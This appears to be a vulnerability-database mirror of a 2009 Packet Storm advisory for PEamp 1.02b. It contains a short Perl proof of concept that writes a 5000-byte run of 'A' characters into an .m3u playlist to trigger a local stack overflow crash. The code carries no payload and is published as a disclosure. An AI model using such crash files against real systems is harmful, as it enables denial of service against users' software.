Lucene search
K

PEamp 1.02b Buffer Overflow

🗓️ 01 Jul 2009 00:00:00Reported by ThE g0bL!NType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

PEamp 1.02b Buffer Overflow in .M3U Fil

Code
`# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##  
# # PEamp 1.02b (.M3U File) Local Stack Overflow POC ##  
# # Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip ##  
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##  
my $chars= "A" x 5000;  
my $file="dz.m3u";  
open(my $FILE, ">>$file") or die "Cannot open $file: $!";  
print $FILE $chars;  
close($FILE);  
print "$file has been created \n";  
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation